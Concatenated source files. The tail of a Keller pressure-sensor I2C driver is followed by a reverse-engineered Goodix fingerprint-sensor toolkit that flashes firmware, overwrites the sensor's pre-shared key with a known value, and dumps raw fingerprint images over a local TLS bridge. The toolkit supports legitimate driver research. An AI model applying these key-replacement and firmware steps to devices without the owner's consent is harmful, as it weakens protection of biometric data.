print("Call init() at least one time before attempting to read()")
return False
self._bus.write_byte(self._SLAVE_ADDRESS, self._REQUEST_MEASUREMENT)
time.sleep(0.01) #10 ms, plenty of time according to spec.
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 5)
statusByte = data[0]
pressureRaw = data[1] << 8 | data[2]
temperatureRaw = data[3] << 8 | data[4]
'''
# Always busy for some reason
busy = statusByte & 1 << 5
if busy:
print("Conversion is not complete.")
return
'''
if statusByte & 0b11 << 3 :
print("Invalid mode: %d, expected 0!") % ((statusByte & 0b11 << 3) >> 3)
return False
if statusByte & 1 << 2 :
print("Memory checksum error!")
return False
self._pressure = (pressureRaw - 16384) * (self.pMax - self.pMin) / 32768 + self.pMin + self.pModeOffset
self._temperature = ((temperatureRaw >> 4) - 24) * 0.05 - 50
self._depth = ((self._pressure * self.PRESSURE_CONVERSION["Pa"]) - 101325) / (self._fluid_density * 9.80665)
self._altitude = (1-((self._pressure * self.PRESSURE_CONVERSION["mbar"] / 1013.25)**0.190284)) * 145366.45 * .3048
self.debug(("data:", data))
self.debug(("pressureRaw:", pressureRaw, "pressure:", self._pressure))
self.debug(("temperatureRaw", temperatureRaw, "temperature:", self._temperature))
self.debug(("depth:", self._depth))
self.debug(("altitude:", self._altitude))
return True
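    # Worked example (illustrative, not from the original file): with pMin = 0,
    # pMax = 30 bar and a raw pressure word of 24576, the transfer function
    # above gives (24576 - 16384) * 30 / 32768 = 7.5 bar before the mode
    # offset is added.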
def set_fluid_density(self, fluid_density):
'''
Provide the density of the working fluid in kg/m^3. Default is for
seawater. Should be 997 for freshwater.
'''
self._fluid_density = fluid_density
return True
def temperature(self):
if self._temperature is None:
print("Call read() first to get a measurement")
return
return self._temperature
def pressure(self, conversion = "bar"):
assert self.PRESSURE_CONVERSION.get(conversion) is not None, "Invalid Pressure Unit: {}".format(conversion)
if self._pressure is None:
print("Call read() first to get a measurement")
return
return self._pressure * self.PRESSURE_CONVERSION[conversion]
def depth(self):
if self._depth is None:
print("Call read() first to get a measurement")
return
return self._depth
def altitude(self):
if self._altitude is None:
print("Call read() first to get a measurement")
return
return self._altitude
def debug(self, msg):
if self._DEBUG:
print(msg)
def __str__(self):
return ("Keller LD I2C Pressure/Temperature Transmitter\n" +
"\ttype: {}\n".format(self.pMode) +
"\tcalibration date: {}-{}-{}\n".format(self.year, self.month, self.day) +
"\tpressure offset: {:.5f} bar\n".format(self.pModeOffset) +
"\tminimum pressure: {:.5f} bar\n".format(self.pMin) +
"\tmaximum pressure: {:.5f} bar".format(self.pMax))
if __name__ == '__main__':
sensor = KellerLD()
if not sensor.init():
print("Failed to initialize Keller LD sensor!")
exit(1)
print(sensor)
while True:
try:
sensor.read()
print("pressure: %7.4f bar\ttemperature: %0.2f C") % (sensor.pressure(), sensor.temperature())
time.sleep(0.001)
except Exception as e:
print(e)
``` |
{
"source": "80avin/goodix-fp-dump",
"score": 2
} |
#### File: 80avin/goodix-fp-dump/driver_511.py
```python
from random import randint
from re import fullmatch
from socket import socket
from subprocess import PIPE, STDOUT, Popen
from time import sleep
from typing import List
from crcmod.predefined import mkCrcFun
from goodix import (FLAGS_TRANSPORT_LAYER_SECURITY, Device, check_message_pack,
decode_image, encode_message_pack)
TARGET_FIRMWARE: str = "GF_ST411SEC_APP_12109"
IAP_FIRMWARE: str = "MILAN_ST411SEC_IAP_12101"
VALID_FIRMWARE: str = "GF_ST411SEC_APP_121[0-9]{2}"
PSK: bytes = bytes.fromhex(
"0000000000000000000000000000000000000000000000000000000000000000")
PSK_WHITE_BOX: bytes = bytes.fromhex(
"ec35ae3abb45ed3f12c4751f1e5c2cc05b3c5452e9104d9f2a3118644f37a04b"
"6fd66b1d97cf80f1345f76c84f03ff30bb51bf308f2a9875c41e6592cd2a2f9e"
"60809b17b5316037b69bb2fa5d4c8ac31edb3394046ec06bbdacc57da6a756c5")
PMK_HASH: bytes = bytes.fromhex(
"ba1a86037c1d3c71c3af344955bd69a9a9861d9e911fa24985b677e8dbd72d43")
DEVICE_CONFIG: bytes = bytes.fromhex(
"701160712c9d2cc91ce518fd00fd00fd03ba000180ca000400840015b3860000"
"c4880000ba8a0000b28c0000aa8e0000c19000bbbb9200b1b1940000a8960000"
"b6980000009a000000d2000000d4000000d6000000d800000050000105d00000"
"00700000007200785674003412200010402a0102042200012024003200800001"
"005c008000560004205800030232000c02660003007c000058820080152a0182"
"032200012024001400800001005c000001560004205800030232000c02660003"
"007c0000588200801f2a0108005c008000540010016200040364001900660003"
"007c0001582a0108005c0000015200080054000001660003007c00015800892e")
SENSOR_WIDTH = 80
SENSOR_HEIGHT = 88
def warning(text: str) -> str:
decorator = "#" * len(max(text.split("\n"), key=len))
return f"\033[31;5m{decorator}\n{text}\n{decorator}\033[0m"
def check_psk(device: Device, tries: int = 2) -> bool:
for _ in range(tries):
reply = device.preset_psk_read_r(0xbb020003)
if not reply[0]:
raise ValueError("Failed to read PSK")
if reply[1] != 0xbb020003:
raise ValueError("Invalid flags")
if reply[2] == PMK_HASH:
return True
return False
def erase_firmware(device: Device) -> None:
device.mcu_erase_app(0)
device.wait_disconnect()
def write_firmware(device: Device,
offset: int,
payload: bytes,
tries: int = 2) -> None:
for _ in range(tries):
if device.write_firmware(offset, payload):
return
raise ValueError("Failed to write firmware")
def update_firmware(device: Device,
path: str = "firmware/511",
tries: int = 2) -> None:
try:
for _ in range(tries):
firmware_file = open(f"{path}/{TARGET_FIRMWARE}.bin", "rb")
firmware = firmware_file.read()
firmware_file.close()
length = len(firmware)
for i in range(0, length, 1008):
write_firmware(device, i, firmware[i:i + 1008])
if device.check_firmware(0, length,
mkCrcFun("crc-32-mpeg")(firmware)):
device.reset(False, True, 20)
device.wait_disconnect()
return
raise ValueError("Failed to update firmware")
except Exception as error:
print(
warning(f"The program went into serious problems while trying to "
f"update the firmware: {error}"))
erase_firmware(device)
raise error
def setup_device(device: Device) -> None:
if not device.reset(True, False, 20)[0]:
raise ValueError("Reset failed")
device.read_sensor_register(0x0000, 4) # Read chip ID (0x2504)
device.read_otp()
# OTP 0: 0x5332383733342e0032778aa2d495ca055107050a7d0bfd274103110cf17f800c38813034a57f5ef406c4bd4201bdb7b9b7b7b7b9b7b73230a55a5ea1850cfd71
# OTP 1: 0x5332423937332e000a777aa3452cec02510705027d4bd5274103d10cf18f700c38c13033a58f5ff407f48e71018eb6b7b6b6b6b7b6b63450a55a5fa0c814d548
# OTP 0 cp data: 0x5332383733342e0032778aa57f5ef4, CRC checksum: 133
# OTP 1 cp data: 0x5332423937332e000a777aa58f5ff4
# OTP 0 mt data: 0x7d0bfd274103110c7f800c3881303406c4bd4201bdb7b9b7b73230, CRC checksum: 113
# OTP 1 mt data: 0x7d4bd5274103d10c8f700c38c1303307f48e71018eb6b7b6b63450
# OTP 0 ft data: 0xa2d495ca055107050af1b7b9b7b7a55a5ea1fd, CRC checksum: 12
# OTP 1 ft data: 0xa3452cec0251070502f1b6b7b6b6b6b7b6b6d5
if not device.reset(True, False, 20)[0]:
raise ValueError("Reset failed")
device.mcu_switch_to_idle_mode(20)
# From OTP 0 : DAC0=0xb78, DAC1=0xb9, DAC2=0xb7, DAC3=0xb7, 0xb7b9b7b7
# From OTP 1 : DAC0=0xb68, DAC1=0xb7, DAC2=0xb6, DAC3=0xb6, 0xb6b7b6b6
device.write_sensor_register(0x0220, b"\x78\x0b") # DAC0=0xb78
device.write_sensor_register(0x0236, b"\xb9\x00") # DAC1=0xb9
device.write_sensor_register(0x0238, b"\xb7\x00") # DAC2=0xb7
device.write_sensor_register(0x023a, b"\xb7\x00") # DAC3=0xb7
if not device.upload_config_mcu(DEVICE_CONFIG):
raise ValueError("Failed to upload config")
if not device.set_powerdown_scan_frequency(100):
raise ValueError("Failed to set powerdown scan frequency")
def connect_device(device: Device, tls_client: socket) -> None:
tls_client.sendall(device.request_tls_connection())
device.write(
encode_message_pack(tls_client.recv(1024),
FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
tls_client.sendall(
check_message_pack(device.read(), FLAGS_TRANSPORT_LAYER_SECURITY))
device.write(
encode_message_pack(tls_client.recv(1024),
FLAGS_TRANSPORT_LAYER_SECURITY))
sleep(0.01) # Important otherwise an USBTimeout error occur
device.tls_successfully_established()
device.query_mcu_state()
def get_image(device: Device, tls_client: socket, tls_server: Popen) -> None:
# while (local_18 < 0x18) {
# (uint16 *)(&DAT_18053d1e8)[local_17 * 2] =
# (uint16 *)(param_1)[local_18] >> 1) << 8) +
# (uint16 *)(param_1)[local_18] >> 1);
# local_17 = local_17 + 1;
# local_18 = local_18 + 2;
# }
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\xae\xae\xbf\xbf\xa4\xa4\xb8\xb8\xa8\xa8\xb7\xb7")
device.nav_0()
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\x80\xaf\x80\xbf\x80\xa3\x80\xb7\x80\xa7\x80\xb6")
device.read_sensor_register(0x0082, 2)
tls_client.sendall(device.mcu_get_image())
write_pgm(decode_image(tls_server.stdout.read(10573)[8:-5]), "clear.pgm")
device.mcu_switch_to_fdt_mode(
b"\x0d\x01\x80\xaf\x80\xbf\x80\xa4\x80\xb8\x80\xa8\x80\xb7")
print("Waiting for finger...")
device.mcu_switch_to_fdt_down(
b"\x0c\x01\x80\xaf\x80\xbf\x80\xa4\x80\xb8\x80\xa8\x80\xb7")
tls_client.sendall(device.mcu_get_image())
write_pgm(decode_image(tls_server.stdout.read(10573)[8:-5]),
"fingerprint.pgm")
def write_pgm(image: List[int], file_name: str) -> None:
file = open(file_name, "w")
file.write(f"P2\n{SENSOR_HEIGHT} {SENSOR_WIDTH}\n4095\n")
file.write("\n".join(map(str, image)))
file.close()
def run_driver(device: Device):
tls_server = Popen([
"openssl", "s_server", "-nocert", "-psk",
PSK.hex(), "-port", "4433", "-quiet"
],
stdout=PIPE,
stderr=STDOUT)
try:
setup_device(device)
tls_client = socket()
tls_client.connect(("localhost", 4433))
try:
connect_device(device, tls_client)
get_image(device, tls_client, tls_server)
finally:
tls_client.close()
finally:
tls_server.terminate()
def main(product: int) -> None:
print(
warning("This program might break your device.\n"
"Consider that it may flash the device firmware.\n"
"Continue at your own risk.\n"
"But don't hold us responsible if your device is broken!\n"
"Don't run this program as part of a regular process"))
code = randint(0, 9999)
if input(f"Type {code} to continue and confirm that you are not a bot: "
) == f"{code}":
previous_firmware = None
while True:
device = Device(product)
device.nop()
device.enable_chip(True)
device.nop()
firmware = device.firmware_version()
print(f"Firmware: {firmware}")
valid_psk = check_psk(device)
print(f"Valid PSK: {valid_psk}")
if firmware == previous_firmware:
raise ValueError("Unchanged firmware")
previous_firmware = firmware
if fullmatch(TARGET_FIRMWARE, firmware):
if not valid_psk:
erase_firmware(device)
continue
run_driver(device)
return
if fullmatch(VALID_FIRMWARE, firmware):
erase_firmware(device)
continue
if fullmatch(IAP_FIRMWARE, firmware):
if not valid_psk:
if not device.preset_psk_write_r(0xbb010003, PSK_WHITE_BOX):
raise ValueError("PSK write failed")
if not check_psk(device):
raise ValueError("Unchanged PSK")
update_firmware(device)
continue
raise ValueError(
"Invalid firmware\n" +
warning("Please consider that removing this security "
"is a very bad idea!"))
```
#### File: 80avin/goodix-fp-dump/goodix.py
```python
from struct import pack as encode
from struct import unpack as decode
from sys import version_info
from time import sleep, time
from typing import List, Literal, Optional, Tuple, Union
from usb.control import get_status
from usb.core import Device as USBDevice
from usb.core import USBError, USBTimeoutError, find
from usb.legacy import (CLASS_DATA, CLASS_VENDOR_SPEC, ENDPOINT_IN,
ENDPOINT_OUT, ENDPOINT_TYPE_BULK)
from usb.util import endpoint_direction, endpoint_type, find_descriptor
if version_info < (3, 8):
raise SystemError("This program require Python 3.8 or newer")
FLAGS_MESSAGE_PROTOCOL: Literal[0xa0] = 0xa0
FLAGS_TRANSPORT_LAYER_SECURITY: Literal[0xb0] = 0xb0
COMMAND_NOP: Literal[0x00] = 0x00
COMMAND_MCU_GET_IMAGE: Literal[0x20] = 0x20
COMMAND_MCU_SWITCH_TO_FDT_DOWN: Literal[0x32] = 0x32
COMMAND_MCU_SWITCH_TO_FDT_UP: Literal[0x34] = 0x34
COMMAND_MCU_SWITCH_TO_FDT_MODE: Literal[0x36] = 0x36
COMMAND_NAV_0: Literal[0x50] = 0x50
COMMAND_MCU_SWITCH_TO_IDLE_MODE: Literal[0x70] = 0x70
COMMAND_WRITE_SENSOR_REGISTER: Literal[0x80] = 0x80
COMMAND_READ_SENSOR_REGISTER: Literal[0x82] = 0x82
COMMAND_UPLOAD_CONFIG_MCU: Literal[0x90] = 0x90
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY: Literal[0x94] = 0x94
COMMAND_ENABLE_CHIP: Literal[0x96] = 0x96
COMMAND_RESET: Literal[0xa2] = 0xa2
COMMAND_MCU_ERASE_APP: Literal[0xa4] = 0xa4
COMMAND_READ_OTP: Literal[0xa6] = 0xa6
COMMAND_FIRMWARE_VERSION: Literal[0xa8] = 0xa8
COMMAND_QUERY_MCU_STATE: Literal[0xae] = 0xae
COMMAND_ACK: Literal[0xb0] = 0xb0
COMMAND_REQUEST_TLS_CONNECTION: Literal[0xd0] = 0xd0
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED: Literal[0xd4] = 0xd4
COMMAND_PRESET_PSK_WRITE_R: Literal[0xe0] = 0xe0
COMMAND_PRESET_PSK_READ_R: Literal[0xe4] = 0xe4
COMMAND_WRITE_FIRMWARE: Literal[0xf0] = 0xf0
COMMAND_READ_FIRMWARE: Literal[0xf2] = 0xf2
COMMAND_CHECK_FIRMWARE: Literal[0xf4] = 0xf4
COMMAND_GET_IAP_VERSION: Literal[0xf6] = 0xf6
def encode_command(cmd0: int, cmd1: int) -> int:
return cmd0 << 4 | cmd1 << 1
def decode_command(command: int) -> Tuple[int, int]:
if command & 0x1:
raise ValueError("Invalid command")
return command >> 4 & 0xf, command >> 1 & 0x7
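# Illustrative check (not in the original module): commands pack cmd0 into the
# high nibble and cmd1 into bits 1-3, so COMMAND_MCU_GET_IMAGE (0x20) is
# cmd0=2, cmd1=0 and the two helpers round-trip.
assert encode_command(0x2, 0x0) == COMMAND_MCU_GET_IMAGE
assert decode_command(COMMAND_MCU_GET_IMAGE) == (0x2, 0x0)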
def encode_message_pack(payload: bytes,
flags: int = FLAGS_MESSAGE_PROTOCOL,
length: Optional[int] = None) -> bytes:
if length is None:
length = len(payload)
data = b""
data += encode("<B", flags)
data += encode("<H", length)
data += encode("<B", sum(data) & 0xff)
data += payload
return data
def decode_message_pack(data: bytes) -> Tuple[bytes, int, int]:
length = decode("<H", data[1:3])[0]
if sum(data[0:3]) & 0xff != data[3]:
raise ValueError("Invalid data")
return data[4:4 + length], data[0], length
def check_message_pack(data: bytes,
flags: int = FLAGS_MESSAGE_PROTOCOL) -> bytes:
data = decode_message_pack(data)
if data[1] != flags or len(data[0]) < data[2]:
raise ValueError("Invalid message pack")
return data[0]
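# Worked example (illustrative, not in the original module): a message pack is
# the flags byte, a little-endian payload length, a one-byte checksum over
# those three header bytes, then the payload.
assert encode_message_pack(b"\x01\x02") == bytes.fromhex("a00200a20102")
assert decode_message_pack(bytes.fromhex("a00200a20102")) == (b"\x01\x02", 0xa0, 2)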
def encode_message_protocol(payload: bytes,
command: int,
length: Optional[int] = None,
checksum: bool = True) -> bytes:
if length is None:
length = len(payload)
data = b""
data += encode("<B", command)
data += encode("<H", length + 1)
data += payload
data += encode("<B", 0xaa - sum(data) & 0xff if checksum else 0x88)
return data
def decode_message_protocol(data: bytes,
checksum: bool = True) -> Tuple[bytes, int, int]:
length = decode("<H", data[1:3])[0]
if checksum:
if data[2 + length] != 0xaa - sum(data[0:2 + length]) & 0xff:
raise ValueError("Invalid data")
elif data[2 + length] != 0x88:
raise ValueError("Invalid data")
return data[3:2 + length], data[0], length - 1
def check_message_protocol(data: bytes,
command: int,
checksum: bool = True) -> bytes:
data = decode_message_protocol(data, checksum)
if data[1] != command or len(data[0]) < data[2]:
raise ValueError("Invalid message protocol")
return data[0]
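# Worked example (illustrative, not in the original module): a protocol frame
# is the command byte, a little-endian length of payload plus one, the payload,
# then a checksum byte equal to (0xaa - sum of the preceding bytes) & 0xff.
assert encode_message_protocol(b"\x01\x00", COMMAND_MCU_GET_IMAGE) == bytes.fromhex("200300010086")
assert check_message_protocol(bytes.fromhex("200300010086"), COMMAND_MCU_GET_IMAGE) == b"\x01\x00"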
def decode_ack(data: bytes) -> Tuple[int, bool]:
if not data[1] & 0x1:
raise ValueError("Invalid data")
return data[0], data[1] & 0x2 == 0x2
def check_ack(data: bytes, command: int) -> bool:
data = decode_ack(data)
if data[0] != command:
raise ValueError("Invalid ack")
return data[1]
def decode_image(data: bytes) -> List[int]:
image = []
for i in range(0, len(data), 6):
chunk = data[i:i + 6]
image.append(((chunk[0] & 0xf) << 8) + chunk[1])
image.append((chunk[3] << 4) + (chunk[0] >> 4))
image.append(((chunk[5] & 0xf) << 8) + chunk[2])
image.append((chunk[4] << 4) + (chunk[5] >> 4))
return image
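# Illustrative check (not in the original module): every 6-byte chunk expands
# into four 12-bit pixels.
assert decode_image(bytes.fromhex("abcdef123456")) == [0xbcd, 0x12a, 0x6ef, 0x345]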
def decode_mcu_state(
data: bytes) -> Tuple[int, bool, bool, bool, int, int, int, int, int]:
    return (data[0], data[1] & 0x1 == 0x1, data[1] & 0x2 == 0x2,
            data[1] & 0x4 == 0x4, data[2] >> 4, data[9],
            decode("<H", data[10:12])[0], data[12], data[13])
class Device:
def __init__(self, product: int, timeout: Optional[float] = 5) -> None:
print(f"__init__({product}, {timeout})")
if timeout is not None:
timeout += time()
while True:
device = find(idVendor=0x27c6, idProduct=product)
if device is not None:
try:
get_status(device)
break
except USBError as error:
if (error.backend_error_code != -1 and
error.backend_error_code != -4):
raise error
if timeout is not None and time() > timeout:
if device is None:
raise USBTimeoutError("Device not found", -5, 19)
raise USBTimeoutError("Invalid device state", -12, 131)
sleep(0.01)
self.device: USBDevice = device
print(f"Found Goodix device: \"{self.device.product}\" "
f"from \"{self.device.manufacturer}\" "
f"on bus {self.device.bus} "
f"address {self.device.address}.")
interface_data = find_descriptor(
self.device.get_active_configuration(),
custom_match=lambda interface: interface.bInterfaceClass ==
CLASS_DATA or interface.bInterfaceClass == CLASS_VENDOR_SPEC)
if interface_data is None:
raise USBError("Interface data not found", -5, 6)
print(f"Found interface data: {interface_data.bInterfaceNumber}")
endpoint_in = find_descriptor(
interface_data,
custom_match=lambda endpoint: endpoint_direction(
endpoint.bEndpointAddress) == ENDPOINT_IN and endpoint_type(
endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)
if endpoint_in is None:
raise USBError("Endpoint in not found", -5, 6)
self.endpoint_in: int = endpoint_in.bEndpointAddress
print(f"Found endpoint in: {hex(self.endpoint_in)}")
endpoint_out = find_descriptor(
interface_data,
custom_match=lambda endpoint: endpoint_direction(
endpoint.bEndpointAddress) == ENDPOINT_OUT and endpoint_type(
endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)
if endpoint_out is None:
raise USBError("Endpoint out not found", -5, 6)
self.endpoint_out: int = endpoint_out.bEndpointAddress
print(f"Found endpoint out: {hex(self.endpoint_out)}")
# Empty device reply buffer (Current patch while waiting for a fix)
self.empty_buffer()
def empty_buffer(self) -> None:
print("empty_buffer()")
try:
while True:
self.read(timeout=0.1)
except USBTimeoutError as error:
if error.backend_error_code == -7:
return
raise error
def write(self, data: bytes, timeout: Optional[float] = 1) -> None:
timeout = 0 if timeout is None else round(timeout * 1000)
length = len(data)
if length % 0x40:
data += b"\x00" * (0x40 - length % 0x40)
for i in range(0, length, 0x40):
self.device.write(self.endpoint_out, data[i:i + 0x40], timeout)
def read(self, size: int = 0x2000, timeout: Optional[float] = 1) -> bytes:
timeout = 0 if timeout is None else round(timeout * 1000)
return self.device.read(self.endpoint_in, size, timeout).tobytes()
def wait_disconnect(self, timeout: Optional[float] = 5) -> None:
print(f"wait_disconnect({timeout})")
if timeout is not None:
timeout += time()
while True:
try:
get_status(self.device)
except USBError as error:
if (error.backend_error_code == -1 or
error.backend_error_code == -4):
break
raise error
if timeout is not None and time() > timeout:
raise USBTimeoutError("Device is still connected", -7, 110)
sleep(0.01)
def nop(self) -> None:
print("nop()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00\x00\x00",
COMMAND_NOP,
checksum=False)))
try:
message = self.read(timeout=0.1)
except USBTimeoutError as error:
if error.backend_error_code == -7:
return
raise error
check_ack(
check_message_protocol(check_message_pack(message), COMMAND_ACK),
COMMAND_NOP)
def mcu_get_image(self) -> bytes:
print("mcu_get_image()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x01\x00", COMMAND_MCU_GET_IMAGE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_GET_IMAGE)
return check_message_pack(self.read() + self.read(0x1000),
FLAGS_TRANSPORT_LAYER_SECURITY)
def mcu_switch_to_fdt_down(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_down({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_DOWN)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_DOWN)
return check_message_protocol(
check_message_pack(self.read(timeout=None)),
COMMAND_MCU_SWITCH_TO_FDT_DOWN)
def mcu_switch_to_fdt_up(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_up({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_UP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_UP)
return check_message_protocol(
check_message_pack(self.read(timeout=None)),
COMMAND_MCU_SWITCH_TO_FDT_UP)
def mcu_switch_to_fdt_mode(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_mode({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_MODE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_MODE)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_MCU_SWITCH_TO_FDT_MODE)
def nav_0(self) -> bytes:
print("nav_0()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x01\x00", COMMAND_NAV_0)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_NAV_0)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_NAV_0, False)
def mcu_switch_to_idle_mode(self, sleep_time: int) -> None:
print(f"mcu_switch_to_idle_mode({sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", sleep_time) + b"\x00",
COMMAND_MCU_SWITCH_TO_IDLE_MODE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_MCU_SWITCH_TO_IDLE_MODE)
def write_sensor_register(self, address: Union[int, List[int]],
value: Union[bytes, List[bytes]]) -> None:
print(f"write_sensor_register({address}, {value})")
if isinstance(address, int):
if not isinstance(value, bytes):
raise ValueError("Invalid value")
message = b"\x00" + encode("<H", address) + value
else:
if isinstance(value, bytes):
raise ValueError("Invalid value")
length = len(address)
if len(value) != length:
raise ValueError("Invalid value")
message = b""
message += b"\x01"
            for i in range(length):
if len(value[i]) != 2:
raise ValueError("Invalid value")
message += encode("<H", address[i])
message += value[i]
self.write(
encode_message_pack(
encode_message_protocol(message,
COMMAND_WRITE_SENSOR_REGISTER)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_WRITE_SENSOR_REGISTER)
def read_sensor_register(self, address: Union[int, List[int]],
length: int) -> Union[bytes, List[bytes]]:
print(f"read_sensor_register({address}, {length})")
if isinstance(address, int):
message = b"\x00" + encode("<H", address) + encode("<B", length)
else:
if length != 2:
raise ValueError("Invalid length")
message = b""
message += b"\x01"
for value in address:
message += encode("<H", value)
message += encode("<B", length)
self.write(
encode_message_pack(
encode_message_protocol(message, COMMAND_READ_SENSOR_REGISTER)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_SENSOR_REGISTER)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_SENSOR_REGISTER)
if isinstance(address, int):
if len(message) < length:
raise SystemError("Invalid response length")
return message
length = len(message) - 1
if length < len(address) * 2:
raise SystemError("Invalid response length")
value = []
for i in range(0, length, 2):
value.append(message[i:i + 2])
return value
def upload_config_mcu(self, config: bytes) -> bool:
print(f"upload_config_mcu({config})")
self.write(
encode_message_pack(
encode_message_protocol(config, COMMAND_UPLOAD_CONFIG_MCU)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_UPLOAD_CONFIG_MCU)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_UPLOAD_CONFIG_MCU)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def set_powerdown_scan_frequency(self,
powerdown_scan_frequency: int) -> bool:
print(f"set_powerdown_scan_frequency({powerdown_scan_frequency})")
self.write(
encode_message_pack(
encode_message_protocol(encode("<H", powerdown_scan_frequency),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def enable_chip(self, enable: bool) -> None:
print(f"enable_chip({enable})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", 0x1 if enable else 0x0) + b"\x00",
COMMAND_ENABLE_CHIP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_ENABLE_CHIP)
def reset(self, reset_sensor: bool, soft_reset_mcu: bool,
sleep_time: int) -> Optional[Tuple[bool, Optional[int]]]:
print(f"reset({reset_sensor}, {soft_reset_mcu}, {sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", (0x1 if reset_sensor else 0x0) |
(0x1 if soft_reset_mcu else 0x0) << 1 |
(0x1 if reset_sensor else 0x0) << 2) +
encode("<B", sleep_time), COMMAND_RESET)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_RESET)
if soft_reset_mcu:
return None
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_RESET)
length = len(message)
if length < 1:
raise SystemError("Invalid response length")
if message[0] != 0x01:
return False, None
if length < 3:
raise SystemError("Invalid response length")
return True, decode("<H", message[1:3])[0]
def mcu_erase_app(self, sleep_time: int) -> None:
print(f"mcu_erase_app({sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00" + encode("<B", sleep_time),
COMMAND_MCU_ERASE_APP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_ERASE_APP)
def read_otp(self) -> bytes:
print("read_otp()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00", COMMAND_READ_OTP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_OTP)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_OTP)
def firmware_version(self) -> str:
print("firmware_version()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00", COMMAND_FIRMWARE_VERSION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_FIRMWARE_VERSION)
return check_message_protocol(check_message_pack(
self.read()), COMMAND_FIRMWARE_VERSION).split(b"\x00")[0].decode()
def query_mcu_state(self) -> bytes:
print("query_mcu_state()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x55", COMMAND_QUERY_MCU_STATE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_QUERY_MCU_STATE)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_QUERY_MCU_STATE)
def request_tls_connection(self) -> bytes:
print("request_tls_connection()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00",
COMMAND_REQUEST_TLS_CONNECTION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_REQUEST_TLS_CONNECTION)
return check_message_pack(self.read(), FLAGS_TRANSPORT_LAYER_SECURITY)
def tls_successfully_established(self) -> None:
print("tls_successfully_established()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00",
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED)
def preset_psk_write_r(self,
flags: int,
payload: bytes,
length: Optional[int] = None,
offset: Optional[int] = None,
pre_flags: Optional[bytes] = None) -> bool:
# TODO support multiples writes
print(f"preset_psk_write_r({flags}, {payload}, {length}, {offset}, "
f"{pre_flags})")
if length is None or offset is None:
if length is not None or offset is not None:
raise ValueError("Invalid length or offset")
data = (b"" if pre_flags is None else pre_flags) + encode(
"<I", flags) + encode("<I", len(payload)) + payload
if length is not None:
total_length = len(data)
if offset + length > total_length:
raise ValueError("Invalid payload, length or offset")
data = encode("<I", total_length) + encode("<I", length) + encode(
"<I", offset) + data[offset:offset + length]
self.write(
encode_message_pack(
